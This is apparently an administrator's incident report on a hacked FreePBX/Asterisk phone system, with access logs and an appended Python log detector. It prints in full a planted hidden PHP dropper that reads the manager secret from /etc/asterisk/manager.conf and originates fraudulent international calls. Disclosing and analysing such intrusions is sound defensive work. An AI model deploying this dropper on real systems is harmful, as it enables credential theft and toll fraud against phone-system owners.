One of my customers was hacked over the weekend. Root was compromised and a file was created in /var/www/html/ named .asterisk.php. The CDR data looks just like yours. This file was used to generate calls to Cuba. The system had no routes for international calls and none showed in the GUI.
Here are the contents of .asterisk.php:
$strUser = "admin";
$strSecret = system("cat /etc/asterisk/manager.conf | awk '/secret/ {print $3};'");
$tech = $_GET['tech'];
$number = "011".$_GET['number'];
$strChannel = $tech."/".$number;
$oSocket = fsockopen ("localhost", 5038, &$errno, &$errstr, 20);
if (!$oSocket) {
echo "$errstr ($errno)<br>\n";
} else {
fputs($oSocket, "Action: Login\r\n");
fputs($oSocket, "Username: $strUser\r\n");
fputs($oSocket, "Secret: $strSecret\r\n\r\n");
fputs($oSocket, "Action: Originate\r\n");
fputs($oSocket, "Channel: $strChannel\r\n");
fputs($oSocket, "Application: Wait\r\n");
fputs($oSocket, "Data: 1800\r\n");
fputs($oSocket, "CallerID: Asterisk<1000000000>\r\n\r\n");
fputs($oSocket, "Action: Logoff\r\n\r\n");
sleep(1);
fclose($oSocket);
}
echo "$number called.\r\n";
?>
Here is a snip of the httpd access log:
::1 - - [15/Apr/2017:15:47:13 -0500] "GET /.asterisk.php?tech=sip/TW&number=971558848092 HTTP/1.1" 200 32 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:47:38 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324210054 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:47:48 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424047 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:50:32 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424047 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
::1 - - [15/Apr/2017:15:50:38 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424045 HTTP/1.1" 200 30 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
The process continued even after I blocked all inbound and outbound traffic to the PBX at the customer's perimeter firewall. It only stopped once I renamed the .asterisk.php file.
Fail2ban logs contain errors regarding the ::1 source address.
WARNING Unable to find a corresponding IP address for ::1: [Errno -9] Address family for hostname not supported
At this point I am not sure how the calls continued to be generated once traffic was blocked. I am not sure if I will find out. I am rebuilding the PBX on the latest distro and properly restricting traffic to the system.
This system is running FreePBX 12.0.76.4 fully patched and Asterisk 11.21.2. Port 5060 was exposed and SSH was accessible via port address translation on a port in the high 50000's. My assumption is that the port was found via a port scanner and somehow fail2ban did not properly ban SSH auth failures.
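The ::1 entries show the requests came from the PBX's own loopback interface, which is why blocking traffic at the perimeter could not stop them. As an added example that is not part of the original post, here is a small Python check that flags this pattern in an Apache access log; the sample lines (adapted from the snippet above, user agents shortened) and the two-indicator threshold are my own assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Apache combined log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
LOOPBACK = {"::1", "127.0.0.1"}

# Constructed sample: two lines adapted from the post's snippet plus one ordinary admin request.
SAMPLE_LOG = [
    '::1 - - [15/Apr/2017:15:47:13 -0500] "GET /.asterisk.php?tech=sip/TW&number=971558848092 HTTP/1.1" 200 32 "-" "curl/7.19.7"',
    '203.0.113.5 - - [15/Apr/2017:15:48:00 -0500] "GET /admin/config.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '::1 - - [15/Apr/2017:15:50:38 -0500] "GET /.asterisk.php?tech=sip/TW&number=5324424045 HTTP/1.1" 200 30 "-" "curl/7.19.7"',
]

def parse_line(line):
    # Split one combined-format line into named fields; None if it does not parse.
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def reasons_for(rec):
    # Indicators matching the dropper in the post; each is weak alone, so scan() wants two.
    reasons = []
    name = rec["path"].rsplit("/", 1)[-1]
    if name.startswith(".") and name.endswith(".php"):
        reasons.append("hidden .php file in the webroot")
    if rec["host"] in LOOPBACK:
        reasons.append("request from loopback, which a perimeter firewall never sees")
    if {"tech", "number"}.issubset(rec["query"]):
        reasons.append("tech/number parameters of the kind fed to AMI Originate")
    return reasons

def scan(lines):
    # Return requests that trip at least two indicators, with the number as actually dialed.
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        reasons = reasons_for(rec)
        if len(reasons) >= 2:
            # the dropper prepends 011 (US international dialing prefix) to the number parameter
            hits.append({"ts": rec["ts"], "dialed": "011" + rec["query"].get("number", ""),
                         "reasons": reasons})
    return hits
```

Running scan(SAMPLE_LOG) returns the two loopback requests with the full dialed numbers (011 plus the parameter), which is what to compare against the CDRs; the admin request is not flagged.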